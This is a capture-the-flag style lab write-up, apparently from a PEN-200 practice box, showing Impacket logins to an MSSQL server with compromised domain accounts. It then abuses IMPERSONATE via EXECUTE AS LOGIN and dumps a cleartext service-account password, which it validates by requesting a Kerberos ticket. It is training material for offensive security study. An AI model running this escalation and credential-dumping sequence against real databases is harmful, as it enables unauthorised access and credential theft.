MSSQL

Nmap discovered a MSSQL service on the target port 1433 and 58538 The running service is Microsoft SQL Server 2019 15.00.2000.00

`info` Session

The info account has been compromised. Attempting to access the target MSSQL instance.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=info@dc.hokkaido-aerospace.com.ccache impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -target-ip $IP -debug      
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: info@dc.hokkaido-aerospace.com.ccache
[+] SPN MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/HOKKAIDO-AEROSPACE.COM@HOKKAIDO-AEROSPACE.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: info
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 192.168.119.40:88
[+] Server time (UTC): 2025-04-25 15:00:08
[+] Exception:
[...REDACTED...]
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

Kerberos authentication throughpass_the_ticket with TGT of the compromised info account fails Possibly due to the TGT not having the required SPN; MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/info:info@dc.hokkaido-aerospace.com -target-ip $IP -windows-auth -debug
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (HAERO\info  guest@master)>

However NTLM authentication with the -windows-auth flag works Authenticated as guest

SQL (HAERO\info  guest@master)> SELECT name from master..sysdatabases;
name
-------   
master
tempdb
model
msdb
hrappdb
 
 
SQL (HAERO\info  guest@tempdb)> use hrappdb;
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\info" is not able to access the database "hrappdb" under the current security context.

There is a none default database,hrappdb, but the info account cannot access the hrappdb database

`discovery` Session

The discovery account has been compromised. Attempting to access the target MSSQL instance.

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ KRB5CCNAME=discovery@dc.hokkaido-aerospace.com.ccache impacket-mssqlclient HOKKAIDO-AEROSPACE.COM/@dc.hokkaido-aerospace.com -k -no-pass -dc-ip $IP -target-ip $IP -debug 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[+] Using Kerberos Cache: discovery@dc.hokkaido-aerospace.com.ccache
[+] SPN MSSQLSVC/DC.HOKKAIDO-AEROSPACE.COM:1433@HOKKAIDO-AEROSPACE.COM not found in cache
[+] AnySPN is True, looking for another suitable SPN
[+] Returning cached credential for KRBTGT/HOKKAIDO-AEROSPACE.COM@HOKKAIDO-AEROSPACE.COM
[+] Using TGT from cache
[+] Username retrieved from CCache: discovery
[+] Searching target's instances to look for port number 1433
[+] Trying to connect to KDC at 192.168.119.40:88
[+] Server time (UTC): 2025-04-25 15:10:14
[+] Exception:
[...REDACTED...]
[-] Kerberos SessionError: KDC_ERR_S_PRINCIPAL_UNKNOWN(Server not found in Kerberos database)

Again. Kerberos authentication throughpass_the_ticket with TGT of the compromised discovery account fails

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-mssqlclient 'HOKKAIDO-AEROSPACE.COM/discovery:Start123!@dc.hokkaido-aerospace.com' -target-ip $IP -windows-auth -debug 
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[+] Impacket Library Installation Path: /usr/lib/python3/dist-packages/impacket
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (HAERO\discovery  guest@master)>

Yet NTLM auth with the -windows-auth flag works Authenticated as guest

Not Authorized

SQL (HAERO\discovery  guest@master)> use hrappdb;
ERROR(DC\SQLEXPRESS): Line 1: The server principal "HAERO\discovery" is not able to access the database "hrappdb" under the current security context.

The hrappdb DB still cannot be accessed by the compromised discovery account

SQL (HAERO\discovery  guest@master)> SELECT name from master..syslogins
name             
--------------   
sa
BUILTIN\Users
hrappdb-reader
HAERO\services
 
SQL (HAERO\discovery  guest@master)> select sp.name as login, sp.type_desc as login_type, sl.password_hash, sp.create_date, sp.modify_date, case when sp.is_disabled = 1 then 'Disabled' else 'Enabled' end as status from sys.server_principals sp left join sys.sql_logins sl on sp.principal_id = sl.principal_id where sp.type not in ('G', 'R') order by sp.name;
login            login_type   password_hash   create_date   modify_date   status     
--------------   ----------   -------------   -----------   -----------   --------   
hrappdb-reader   SQL_LOGIN             NULL   2023-11-25 06:05:50   2023-11-25 06:05:50   b'Enabled'   
 
sa               SQL_LOGIN             NULL   2003-04-08 09:10:35   2023-11-25 05:47:06   b'Disabled'

Checking the list of user reveals a user that appears to be relevant to the forbidden hrappdb database; hrappdb-reader

Impersonation

In MSSQL, IMPERSONATE in MSSQL allows a user with appropriate privileges to assume the identity and permissions of another user or login. This can be abused by attackers post-compromise to laterally move within the database or escalate privileges. It’s often used in conjunction with EXECUTE AS statements to impersonate higher-privileged roles. Privilege enumeration should include checking IMPERSONATE permissions via SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'

SQL (HAERO\discovery  guest@master)> SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
name
--------------   
hrappdb-reader

Checking for impersonation reveals that the current user, discovery, is able to impersonate the hrappdb-reader user

SQL (HAERO\discovery  guest@master)> EXECUTE AS LOGIN = 'hrappdb-reader'
SQL (hrappdb-reader  guest@master)>

Successfully authenticated as the hrappdb-reader user

`hrappdb-reader` Session

SQL (hrappdb-reader  guest@master)> use hrappdb;
ENVCHANGE(DATABASE): Old Value: master, New Value: hrappdb
INFO(DC\SQLEXPRESS): Line 1: Changed database context to 'hrappdb'.
SQL (hrappdb-reader  hrappdb-reader@hrappdb)>

Switching to the hrappdb DB

`hrappdb` DB

SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb.INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
hrappdb         dbo            sysauth      b'BASE TABLE'

The hrappdb DB has a single table; sysauth

SQL (hrappdb-reader  hrappdb-reader@hrappdb)> SELECT * FROM hrappdb..sysauth;
id   name               password           
--   ----------------   ----------------   
 0   b'hrapp-service'   b'Untimed$Runny'

The sysauth table contains the credential of the hrapp-service account; Untimed$Runny

Validation

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ impacket-getTGT HOKKAIDO-AEROSPACE.COM/hrapp-service@dc.hokkaido-aerospace.com -dc-ip $IP   
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
Password: Untimed$Runny
[*] Saving ticket in hrapp-service@dc.hokkaido-aerospace.com.ccache

Validated TGT generated for the hrapp-service account

InfoSec LAB

Explorer

Hokkaido_MSSQL

MSSQL

`info` Session

`discovery` Session

Not Authorized

Impersonation

`hrappdb-reader` Session

`hrappdb` DB

Validation

Interactive Graph View

Table of Contents

Backlinks

InfoSec LAB

Explorer

Hokkaido_MSSQL

MSSQL

info Session

discovery Session

Not Authorized

Impersonation

hrappdb-reader Session

hrappdb DB

Validation

Interactive Graph View

Table of Contents

Backlinks

`info` Session

`discovery` Session

`hrappdb-reader` Session

`hrappdb` DB